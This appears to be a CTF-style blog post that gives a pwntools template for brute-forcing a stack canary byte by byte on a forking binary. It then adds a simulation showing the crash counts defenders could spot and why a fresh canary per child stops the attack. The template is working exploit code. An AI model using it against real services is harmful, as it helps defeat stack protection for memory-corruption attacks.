ReStr0
Member of the Venom team, Chamd5 security team
ReStr0-Blog

Canary Brute-Forcing

General template

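#coding=utf8
# Python 2 script (print statements, str payloads) using pwntools
from pwn import *
context.log_level = 'debug'
context.terminal = ['gnome-terminal','-x','bash','-c']
context(arch='i386', os='linux')
local = 1   # 1: run ./bin1 locally, 0: connect to the remote service
elf = ELF('./bin1')

if local:
    p = process('./bin1')
    #libc = elf.libc

else:
    p = remote('',)      # host and port are left blank in the template
    libc = ELF('./')     # libc path is left blank in the template
p.recvuntil('welcome\n')
# The script starts from a known 0x00 low byte and guesses the other 3 bytes
canary = '\x00'
for k in range(3):
    for i in range(256):
        # "Brute-forcing canary byte number k+1"
        print "正在爆破Canary的第" + str(k+1)+"位"
        # "Current character is ..."
        print "当前的字符为"+ chr(i)
        # 100 filler bytes, then the canary bytes known so far plus one guessed byte
        payload='a'*100 + canary + chr(i)
        # "Current payload is: ..."
        print "当前payload为:",payload
        p.send(payload)
        data=p.recvuntil("welcome\n")
        print data
        # Marker string kept exactly as in the original script
        if "sucess" in data:
            canary += chr(i)
            print "Canary is: " + canary
            break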
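
The loop above can only converge when every attempt is checked against the same canary, which is what happens when a server forks one child per request without re-executing. As an added example (not from the original post), this Python 3 simulation replaces the real binary with a constructed in-memory model to show the request and abort counts a defender would see, and why a fresh canary per child removes the oracle; `Service`, `bytewise_search` and `compare` are hypothetical names.

```python
import itertools
import os

PAD = 100        # filler length before the canary, as in the template above
CANARY_LEN = 4   # i386: one NUL byte followed by three random bytes

def random_canary():
    return b"\x00" + os.urandom(CANARY_LEN - 1)

class Service:
    """Constructed model of the target: every request is handled by one child."""
    def __init__(self, canaries):
        self.canaries = canaries   # iterator: the canary each child sees
        self.aborts = 0            # children killed by the stack check

    def handle(self, data):
        canary = next(self.canaries)
        overwritten = data[PAD:PAD + CANARY_LEN]
        if canary.startswith(overwritten):   # overwritten prefix still matches
            return True                      # child returns normally
        self.aborts += 1                     # stack check fails, child aborts
        return False

def bytewise_search(svc):
    """Same loop shape as the template; returns (canary or None, requests sent)."""
    known, attempts = b"\x00", 0
    for _ in range(CANARY_LEN - 1):
        for i in range(256):
            attempts += 1
            if svc.handle(b"a" * PAD + known + bytes([i])):
                known += bytes([i])
                break
        else:
            return None, attempts   # no value survived at this position
    return known, attempts

def compare():
    """Run the search against a fork-only model and a fresh-canary model."""
    secret = random_canary()
    forked = Service(itertools.repeat(secret))                   # inherited canary
    fresh = Service(random_canary() for _ in itertools.count())  # new one per child
    return (secret, bytewise_search(forked), forked.aborts,
            bytewise_search(fresh), fresh.aborts)

if __name__ == "__main__":
    secret, (found, n), aborts, (found2, n2), aborts2 = compare()
    print("inherited canary:", found == secret, n, "requests,", aborts, "aborts")
    print("fresh canary per child:", found2, n2, "requests,", aborts2, "aborts")
```

With an inherited canary the search needs at most 768 requests and all but three of them end in an aborted child, a burst that crash monitoring can alert on. With a fresh canary per child, any value the search returns matched a different canary at each step and is not the secret of any process.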

2021-08-15